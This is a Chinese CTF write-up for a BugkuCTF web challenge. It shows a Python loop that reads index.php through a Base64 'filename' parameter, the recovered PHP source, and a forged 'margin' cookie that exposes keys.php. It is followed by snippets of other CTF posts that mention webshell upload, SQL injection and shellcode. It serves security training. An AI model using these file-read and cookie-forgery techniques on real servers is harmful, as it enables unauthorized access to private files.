VZZmieshenquan

【BugkuCTF】Web--cookies欺骗

Description:

http://123.206.87.240:8002/web11/

答案格式：KEY{xxxxxxxx}

Solution:

打开网页，发现URL有一段Base64URL解码得keys.txt，试了一些方法之后，将index.php也Base64编码了一下，尝试用filename读取index.php发现出现了php的第一行，所以这里我选择用python遍历index.php

代码（经过测试，一共18行代码）
import requests
s = requests.session()
for line in range(1, 19):
    url = 'http://123.206.87.240:8002/web11/index.php?line={}&filename=aW5kZXgucGhw'.format(line)
    print(s.get(url).text)
得到php代码
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
从php代码中可以看出来，我们需要将keys.php这段字符串Base64加密
a2V5cy5waHA=
然后将其作为filename的值，还要构造Cookie: margin=margin这个Cookie头完成任务！

Flag:

KEY{key_keys}

你可能感兴趣的:(ctf.bugku.com)

BugKu-Web-矛盾 H_u_p 网络安全
BugKu-Web-矛盾题目链接:https://ctf.bugku.com/challenges/detail/id/72.html考点：PHP弱类型比较漏洞题目源码分析：$num=$_GET['num'];//定义一个num变量用get方法接收if(!is_numeric($num))//判断如果$num不全为数字或数字字符串,满足就执行下面的代码{echo$num;if($num==1)//
bugku-渗透测试1通关 wp XingHe_0 渗透测试安全
前言题型取自bugku-渗透测试1https://ctf.bugku.com/ctfplus/detail/id/1.html内容包含：查看js源码、上传webshell、pwn、Nday利用、内网代理、端口转发、提权场景1查看js源码，搜索flag字符串，flag{ee34145ad2a5e1d2af2b4411959f019e}场景2根据场景1的提示找到后台管理页面http://101.132
3-8 靶场 / php / docker Life And Death War 安全 web安全
今日目标：两个漏洞资料查找，及博文复现，实操ctf靶场实践php语言基础，docker基础ctf靶场实践备注：该类型靶场为在线靶场，无需自己搭建搭建环境，部分靶场有解题思路分享，适合初学入门做记录做题思路和流程。1、BugkuCTF（经典靶场，难度适中，适合入门刷题，题量大）https://ctf.bugku.com/2、XCTF攻防世界：https://adworld.xctf.org.cn/t
NewStarCTF 2023 公开赛道 Week3 Fab1an CTF 网络安全 web安全 http 网络笔记
官方WPhttps://shimo.im/docs/QPMRxzGktzsZnzhz/readNewStarCTF2023Week3官方WriteUp.htmlCryptoRabin’sRSA参考博客：RSA攻击之Rabin密码体制_rsarabin-CSDN博客使用轩禹一把梭了Misc阳光开朗大男孩社会主义核心价值观https://ctf.bugku.com/tool/cvecode解码得到ke
RSA从原理到ctf解题（解题篇Ⅰ）漫谈
bugkursa一道关于rsa常规的ctf题目（来自bugku）：链接：https://ctf.bugku.com/files/98e8f374f63ee3ef4818621ceafcb78f/rsa.txtrsa2.png题目给出了e（公钥）和N（p*q）可以看到e是一个很大的数，对于这种e很大的数我们一般会采用wienerattack进行破解(wienerattack是一种对e极大导致d会比较
Bugku CTF Reverse.7 逆向入门 LoseHu CTF BUGKU Reverse
题目：https://ctf.bugku.com/challenges/detail/id/118.html用wine发现打不开？？用IDA打开试试好家伙，咩函数都唔，但是看到png：base64就懂了直接base64转png得到一个二维码扫码得bugku{inde_9882ihsd8-0}
【CTF-web】变量1（php全局变量） Sankkl1 ctf 前端 php 开发语言
题目链接：https://ctf.bugku.com/challenges/detail/id/76.html注意到$$args，那么我们可以通过args输入一个已定义变量的名称来得到它的值，于是查询php的九大全局变量，如下表所示。变量作用$_POST广泛用于收集提交method=“post”的HTML表单后的表单数据。$_POST也常用于传递变量。$_GET可用于收集提交HTML表单(meth
【CTF-web】备份是个好习惯（查找备份文件、双写绕过、md5加密绕过） Sankkl1 ctf 网络安全前端 php
题目链接：https://ctf.bugku.com/challenges/detail/id/83.html经过扫描可以找到index.php.bak备份文件，下载下来后打开发现是index.php的原代码，如下图所示。由代码可知我们要绕过md5加密，两数如果满足科学计数法的形式的话，php会将其当作科学计数法所得的数字来进行比较，根据该原理，如果两个md5码是0e开头且满足科学计数法的表示形式
【CTF-web】修改请求头（XFF） Sankkl1 ctf 网络协议网络安全
题目链接：https://ctf.bugku.com/challenges/detail/id/79.html随意输入后可以看到需要本地管理员登录，得知这是一道需要修改XFF头的题。XFF即X-Forwarded-For，该请求标头是一个事实上的用于标识通过代理服务器连接到web服务器的客户端的原始IP地址的标头。我们可以通过伪造XFF头来假装本地登录，即在request头中加入X-Forward
【CTF-MISC】这是一张单纯的图片 Sankkl1 ctf 网络安全 html
题目链接：https://ctf.bugku.com/challenges/detail/id/2.html下载图片，使用010Editor打开：在文件末尾可以看到疑似HTML实体的内容，将其解码即可得到答案。
【CTF-MISC】眼见非实（掌握各类文件头） Sankkl1 ctf 网络安全
题目链接：https://ctf.bugku.com/challenges/detail/id/5.html下载是一个.docx文档，用010Editor打开查看文件头发现应该是zip文件，修改后缀后解压，查找flag。各类常用文件头如下表所示。文件类型文件头JPEG(jpg)FFD8FFE1PNG(png)89504E47GIF(gif)47494638TIFF(tif)49492A00CAD(
【CTF-MISC】1和0的故事（二维码定位点补全） Sankkl1 ctf 网络安全
题目链接：https://ctf.bugku.com/challenges/detail/id/216.html文件中得到一个01方阵，可以在010Editor中高亮设置将1涂为黑色、0涂为白色，如下图所示。截图以后调整大小再加入三个定位点即可得到二维码。扫描即可得到答案。要注意的是定位点和内容之间有一格空隙。
第二届“金盾信安杯”网络安全大赛misc部分wp 没用的阿吉1 ctf
文章目录前言一、4位数字二、小火龙三、五瓶药水前言全为miscwp一、4位数字下载后得到一个压缩包，打开需要密码，文件名已经提示为四位数字，所以直接上ARCHPR进行爆破爆破拿到密码9156 打开后是两个文件在路飞的烦恼中直接看到社会主义核心价值观直接解密，贴上解密网址https://ctf.bugku.com/tool/cvecode解密后得到++++++++[>>++>++++>
CTF刷题网站汇总（包括本地可以自己搭建的）（1） qq_51550750 CTF刷题 web安全安全
CTF刷题网站汇总（包括本地可以自己搭建的）CTF刷题平台汇总（欢迎各位师傅们补充）第一个当然是CTFshow啦！https://ctf.show/攻防世界https://adworld.xctf.org.cn/Bugkuhttps://ctf.bugku.com/论剑场https://new.bugku.com/Buuctfhttps://buuoj.cn/Jarvisojhttps://www
bugku 社工-进阶收集 [MISC] AYO_YO CTF_BugKu 信息安全数据挖掘
题目链接：https://ctf.bugku.com/challenges/detail/id/188.html?page=4题目作者:Aman提示:flag{小美小区名字拼音}描述:小明当年为了追求小美想尽办法获得小美的地址。直到有一天小美发了一条说说，小明觉得希望来了。(实战改编题，难度降低了。)解题思路：拿到题目给的文件，是一张QQ空间的截图。通过binwalk、zsteg和StegSolv
mysql宽字节注入_宽字节注入解析 Age5 mysql宽字节注入
在一个CTF练习的网站，看到了一个宽字节注入的题目，我是一个web萌新，没什么经验，一开始也没有想到是宽字节，还是一位朋友给我提到的，让我猛然大悟，咳咳。。。做一些总结。练习题目网站地址：http://ctf.bugku.com。一、了解一下宽字节注入原理前提：1、我们都知道，在防御SQL注入的时候，大多说都是使用的过滤特殊字符，或者使用函数将特殊字符转化为实体，就是说在字符转义，添加‘\’。这里
BugKuCTF 杂项签到题 STZG 信息安全类
https://ctf.bugku.com/files/a45ef3c87135eabd7d472d5a60d86447/qrcode_for_gh_d10dfd684f1b_258.jpg题解：扫码关注即可
BugkuCTF—红绿灯(Misc) loadding... CTF
题目链接:https://ctf.bugku.com/challenges#%E7%BA%A2%E7%BB%BF%E7%81%AF题目给出了一个gif打开后发现是一个闪烁的红绿灯共1168帧一帧一帧查看发现多数是红色和绿色，偶尔有黄色且（每8个红绿后跟一个黄）可以推测红色和绿色对应二进制0和1，黄色作为分隔这样第一个黄灯之前数值为01100110或10011001而01100110二进制转成asc
BugKuCTF_WEB题解报告 whatacutepanda ctf learning BugKu
在学习CTF中，写点东西记录自己的学习，也算是一个反思吧。http://ctf.bugku.com/challengesweb2：这个只用简单的按F12就能看到文件上传测试：我们首先随便传入一个PHP文件尝试一下发现提示说非图片文件那么我们再尝试传入一个图片然后我们思考一下题目要求说上传一个PHP文件但是上传PHP时提示非图片，上传图片时提示非PHP那我们先尝试上传一个PHP然后用burp抓包将其
Bugku流量分析题目总结 sn1percht 流量分析
0x01flag被盗题目链接：https://ctf.bugku.com/files/e0b57d15b3f8e6190e72987177da1ffd/key.pcapng解题思路：这个题目是比较基本的流量分析题，拿到数据包后，查看几个数据比较大的可疑数据，追踪TCP流即可拿到flagflag：flag{This_is_a_f10g}0x02中国菜刀题目链接：https://ctf.bugku.c
隐写 xyx107 bugkuweb题解
http://ctf.bugku.com/challenges#%E9%9A%90%E5%86%99下附binwalk使用附件下载下来之后，发现图片和缩略图不一样，貌似只有这一个提示。1.习惯的使用stegsolve打开，查看文件格式，没有发现2.winhex，png图片，貌似也没有问题3.上binwalk,还是啥也没有，zlib据这篇文章https://www.jianshu.com/p/262
使用MP3stego将MP3音频进行提取 KO1€ writeup
题目：https://ctf.bugku.com/challenges#%E6%97%8B%E8%BD%AC%E8%B7%B3%E8%B7%83一看题目，似乎在提示着什么。下载文件，解压文件发现是一个MP3音频。一想到MP3要立马想到MP3stego工具。链接:https://pan.baidu.com/s/1eE3P19ZtXAhYiJYrCVNw7A提取码:bvem该工具一般用于提取文件，所以
【BugkuCTF】Misc--隐写2 VZZmieshenquan ctf.bugku.com
Description:文件：https://ctf.bugku.com/files/af49803469dfdabb80acf562f9381335/Welcome_.jpgSolution:下载图片直接Foremost提取看看发现有个zip文件，解压后得到一个rar文件和提示提示内容(表示看不懂)：……直接rar爆破吧反正才3个数得到密码871，解压出来这样一张图扔到Winhex看看，发现了f
寒假第一周的CTFwp Sylvanas=-= 网安
题目来源：https://ctf.bugku.com/1.Webf12查看网页源代码得到flag：KEY{Web-2-bugKssNNikls9100}计算很简单，但是只能输入一位数字，F12查看源代码发现输入框的输入长度被限制了，那么只要修改输入长度就可以了得到flag：flag{CTF-bugku-0032}根据给出的源代码，构建一个payload：http://123.206.87.240:
bugku——love 滴滴肥猫逆向
题目链接：https://ctf.bugku.com/challenges#love作为一个逆向小白，这道题我觉得有必要记录下，这道题我自己分析了一半，没有完全分析出来(觉得是自己见的题少，没有做题经验，而且需要熟悉下各种加密），参考了网上大佬们的博客。首先把这个拖进exeinfope中看看有啥重要信息没从上面得到用c++写的，32位，无壳，符合PE结构，然后拉进IDA中看看（一键F5）看主函数，
Writeup bugku刷题 pwn2 偏头痛、 pwn
概述：bugku新出的pwn题，练一练手关键字：栈溢出x64网址：https://ctf.bugku.com/challenges分析一下代码，发现非常明显是x64下的栈溢出。Pwntools生成shellcode>>>frompwnimport*>>>context(os='linux',arch='amd64',log_level='debug')>>>asm(shellcraft.sh())
CTF web题日常积累——代码审计题型（持续更新）白色爬虫 CTF积累
1.变量1题目来源：https://ctf.bugku.com/challenges这是一个入门的代码审计题，难度不大，主要在于看代码逻辑和正则。题目链接直接打开便是一段php源码，直接观察这个代码。明显可以看到一个正则表达式，这个正则表达式意为匹配都是字母的串。而这里明显光是正则表达式是不够的，继续仔细看，在最后有一个$$args，这是可变变量的意思，如$args的值是另一个变量的变量名，那么$
Sqlmap盲注的过程分析 xiaopan233 web安全
用一道bugku的CTF的题目来作为分析对象https://ctf.bugku.com/challenges里面的分析类里的信息提取初初看数据包。先过滤非HTTP的流量，便于分析。Wireshark中执行过滤http先看前面的可以看到。Sqlmap进行了试探性的注入点探测。从前面的几个数据包就可以知道Sqlmap请求的时候是进行了URL编码的。不易理解。不过还好接下来看响应包的时候发现，响应包直接
bugkuCTFWEB部分WP 笑花大王
前言之前做的今天整理下这个有点乱不建议大家参考我的wp这个主要是自己看的。部分的我做的时候打不开就没写。练手地址:https://ctf.bugku.com矛盾矛盾考察的是PHP弱类型首先is_numeric()函数判断是不是数字或字符串取反则必须要输入字符串而且这个字符串还要==1这里用到PHP弱类型比较如:1=1aaaa所以构造payload:http://123.206.87.240:800
bugku—INSERT INTO注入解答 jlu16 杂乱的东西
本来不打算单独的ctf题目成文，但是这个题写payload快看花我的眼睛了，不写一篇记录一下代码对不住我的眼睛。题目主页：https://ctf.bugku.com/challengeserror_reporting(0);functiongetIp(){$ip='';if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_
java工厂模式 3213213333332132 java 抽象工厂
工厂模式有 1、工厂方法 2、抽象工厂方法。下面我的实现是抽象工厂方法, 给所有具体的产品类定一个通用的接口。 package 工厂模式; /** * 航天飞行接口 * * @Description * @author FuJianyong * 2015-7-14下午02:42:05 */ public interface SpaceF
nginx频率限制+python测试 ronin47 nginx 频率 python
部分内容参考：http://www.abc3210.com/2013/web_04/82.shtml 首先说一下遇到这个问题是因为网站被攻击，阿里云报警，想到要限制一下访问频率，而不是限制ip（限制ip的方案稍后给出）。nginx连接资源被吃空返回状态码是502，添加本方案限制后返回599，与正常状态码区别开。步骤如下：
java线程和线程池的使用 dyy_gusi ThreadPool thread Runnable timer
java线程和线程池一、创建多线程的方式 java多线程很常见，如何使用多线程，如何创建线程，java中有两种方式，第一种是让自己的类实现Runnable接口，第二种是让自己的类继承Thread类。其实Thread类自己也是实现了Runnable接口。具体使用实例如下： 1、通过实现Runnable接口方式 1 2
Linux 171815164 linux
ubuntu kernel http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.1.2-unstable/ 安卓sdk代理 mirrors.neusoft.edu.cn 80 输入法和jdk sudo apt-get install fcitx su
Tomcat JDBC Connection Pool g21121 Connection
Tomcat7 抛弃了以往的DBCP 采用了新的Tomcat Jdbc Pool 作为数据库连接组件，事实上DBCP已经被Hibernate 所抛弃，因为他存在很多问题，诸如：更新缓慢，bug较多，编译问题，代码复杂等等。 Tomcat Jdbc P
敲代码的一点想法永夜-极光 java 随笔感想
入门学习java编程已经半年了,一路敲代码下来,现在也才1w+行代码量,也就菜鸟水准吧,但是在整个学习过程中,我一直在想,为什么很多培训老师,网上的文章都是要我们背一些代码?比如学习Arraylist的时候,教师就让我们先参考源代码写一遍,然
jvm指令集程序员是怎么炼成的 jvm 指令集
转自：http://blog.csdn.net/hudashi/article/details/7062675#comments 将值推送至栈顶时 const ldc push load指令 const系列该系列命令主要负责把简单的数值类型送到栈顶。(从常量池或者局部变量push到栈顶时均使用) 0x02 &nbs
Oracle字符集的查看查询和Oracle字符集的设置修改 aijuans oracle
本文主要讨论以下几个部分：如何查看查询oracle字符集、修改设置字符集以及常见的oracle utf8字符集和oracle exp 字符集问题。一、什么是Oracle字符集 Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储，处理，检索数据。它使数据库工具，错误消息，排序次序，日期，时间，货
png在Ie6下透明度处理方法 antonyup_2006 css 浏览器 Firebug IE
由于之前到深圳现场支撑上线，当时为了解决个控件下载，我机器上的IE8老报个错，不得以把ie8卸载掉，换个Ie6,问题解决了，今天出差回来，用ie6登入另一个正在开发的系统，遇到了Png图片的问题，当然升级到ie8(ie8自带的开发人员工具调试前端页面JS之类的还是比较方便的，和FireBug一样，呵呵)，这个问题就解决了，但稍微做了下这个问题的处理。我们知道PNG是图像文件存储格式，查询资
表查询常用命令高级查询方法(二) 百合不是茶 oracle 分页查询分组查询联合查询
----------------------------------------------------分组查询 group by having --平均工资和最高工资 select avg(sal)平均工资,max(sal) from emp ; --每个部门的平均工资和最高工资
uploadify3.1版本参数使用详解 bijian1013 JavaScript uploadify3.1
使用：绑定的界面元素<input id='gallery'type='file'/>$("#gallery").uploadify({设置参数，参数如下}); 设置的属性： id: jQuery(this).attr('id'),//绑定的input的ID langFile: 'http://ww
精通Oracle10编程SQL(17)使用ORACLE系统包 bijian1013 oracle 数据库 plsql
/* *使用ORACLE系统包 */ --1.DBMS_OUTPUT --ENABLE:用于激活过程PUT,PUT_LINE,NEW_LINE,GET_LINE和GET_LINES的调用 --语法：DBMS_OUTPUT.enable(buffer_size in integer default 20000); --DISABLE:用于禁止对过程PUT,PUT_LINE,NEW
【JVM一】JVM垃圾回收日志 bit1129 垃圾回收
将JVM垃圾回收的日志记录下来，对于分析垃圾回收的运行状态，进而调整内存分配(年轻代，老年代，永久代的内存分配)等是很有意义的。JVM与垃圾回收日志相关的参数包括： -XX:+PrintGC -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -Xloggc -XX:+PrintGC 通
Toast使用白糖_ toast
Android中的Toast是一种简易的消息提示框，toast提示框不能被用户点击，toast会根据用户设置的显示时间后自动消失。创建Toast 两个方法创建Toast makeText(Context context, int resId, int duration) 参数：context是toast显示在
angular.identity boyitech AngularJS AngularJS API
angular.identiy 描述: 返回它第一参数的函数. 此函数多用于函数是编程. 使用方法: angular.identity(value); 参数详解: Param Type Details value * to be returned. 返回值: 传入的value 实例代码: <!DOCTYPE HTML>
java-两整数相除，求循环节 bylijinnan java
import java.util.ArrayList; import java.util.List; public class CircleDigitsInDivision { /** * 题目：求循环节，若整除则返回NULL，否则返回char*指向循环节。先写思路。函数原型：char*get_circle_digits(unsigned k,unsigned j)
Java 日期周年 Chen.H java C++c C#
/** * java日期操作(月末、周末等的日期操作) * * @author * */ public class DateUtil { /** */ /** * 取得某天相加(减)後的那一天 * * @param date * @param num *
[高考与专业]欢迎广大高中毕业生加入自动控制与计算机应用专业 comsci 计算机
不知道现在的高校还设置这个宽口径专业没有,自动控制与计算机应用专业,我就是这个专业毕业的,这个专业的课程非常多,既要学习自动控制方面的课程,也要学习计算机专业的课程,对数学也要求比较高.....如果有这个专业,欢迎大家报考...毕业出来之后,就业的途径非常广..... 以后
分层查询（Hierarchical Queries） daizj oracle 递归查询层次查询
Hierarchical Queries If a table contains hierarchical data, then you can select rows in a hierarchical order using the hierarchical query clause: hierarchical_query_clause::= start with condi
数据迁移 daysinsun 数据迁移
最近公司在重构一个医疗系统，原来的系统是两个.Net系统，现需要重构到java中。数据库分别为SQL Server和Mysql，现需要将数据库统一为Hana数据库，发现了几个问题，但最后通过努力都解决了。 1、原本通过Hana的数据迁移工具把数据是可以迁移过去的，在MySQl里面的字段为TEXT类型的到Hana里面就存储不了了，最后不得不更改为clob。 2、在数据插入的时候有些字段特别长
C语言学习二进制的表示示例 dcj3sjt126com c basic
进制的表示示例 # include <stdio.h> int main(void) { int i = 0x32C; printf("i = %d\n", i); /* printf的用法 %d表示以十进制输出 %x或%X表示以十六进制的输出 %o表示以八进制输出 */ return 0; }
NsTimer 和 UITableViewCell 之间的控制 dcj3sjt126com ios
情况是这样的: 一个UITableView, 每个Cell的内容是我自定义的 viewA viewA上面有很多的动画, 我需要添加NSTimer来做动画, 由于TableView的复用机制, 我添加的动画会不断开启, 没有停止, 动画会执行越来越多. 解决办法: 在配置cell的时候开始动画, 然后在cell结束显示的时候停止动画查找cell结束显示的代理
MySql中case when then 的使用 fanxiaolong casewhenthenend
select "主键", "项目编号", "项目名称","项目创建时间", "项目状态","部门名称","创建人" union (select pp.id as "主键", pp.project_number as &
Ehcache（01）——简介、基本操作 234390216 cache ehcache 简介 CacheManager crud
Ehcache简介目录 1 CacheManager 1.1 构造方法构建 1.2 静态方法构建 2 Cache 2.1&
最容易懂的javascript闭包学习入门 jackyrong JavaScript
http://www.ruanyifeng.com/blog/2009/08/learning_javascript_closures.html 闭包（closure）是Javascript语言的一个难点，也是它的特色，很多高级应用都要依靠闭包实现。下面就是我的学习笔记，对于Javascript初学者应该是很有用的。一、变量的作用域要理解闭包，首先必须理解Javascript特殊
提升网站转化率的四步优化方案 php教程分享数据结构 PHP 数据挖掘 Google 活动
网站开发完成后,我们在进行网站优化最关键的问题就是如何提高整体的转化率，这也是营销策略里最最重要的方面之一，并且也是网站综合运营实例的结果。文中分享了四大优化策略：调查、研究、优化、评估，这四大策略可以很好地帮助用户设计出高效的优化方案。 PHP开发的网站优化一个网站最关键和棘手的是，如何提高整体的转化率，这是任何营销策略里最重要的方面之一，而提升网站转化率是网站综合运营实力的结果。今天，我就分
web开发里什么是HTML5的WebSocket？ naruto1990 Web html5 浏览器 socket
当前火起来的HTML5语言里面，很多学者们都还没有完全了解这语言的效果情况，我最喜欢的Web开发技术就是正迅速变得流行的 WebSocket API。WebSocket 提供了一个受欢迎的技术，以替代我们过去几年一直在用的Ajax技术。这个新的API提供了一个方法，从客户端使用简单的语法有效地推动消息到服务器。让我们看一看6个HTML5教程介绍里的 WebSocket API：它可用于客户端、服
Socket初步编程——简单实现群聊 Everyday都不同 socket 网络编程初步认识
初次接触到socket网络编程，也参考了网络上众前辈的文章。尝试自己也写了一下，记录下过程吧：服务端：（接收客户端消息并把它们打印出来） public class SocketServer { private List<Socket> socketList = new ArrayList<Socket>(); public s
面试：Hashtable与HashMap的区别（结合线程） toknowme
昨天去了某钱公司面试，面试过程中被问道 Hashtable与HashMap的区别？当时就是回答了一点，Hashtable是线程安全的，HashMap是线程不安全的，说白了，就是Hashtable是的同步的，HashMap不是同步的，需要额外的处理一下。今天就动手写了一个例子，直接看代码吧 package com.learn.lesson001; import java
MVC设计模式的总结 xp9802 设计模式 mvc 框架 IOC
随着Web应用的商业逻辑包含逐渐复杂的公式分析计算、决策支持等，使客户机越来越不堪重负，因此将系统的商业分离出来。单独形成一部分，这样三层结构产生了。其中‘层’是逻辑上的划分。三层体系结构是将整个系统划分为如图2.1所示的结构[3] （1）表现层（Presentation layer）：包含表示代码、用户交互GUI、数据验证。该层用于向客户端用户提供GUI交互，它允许用户

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他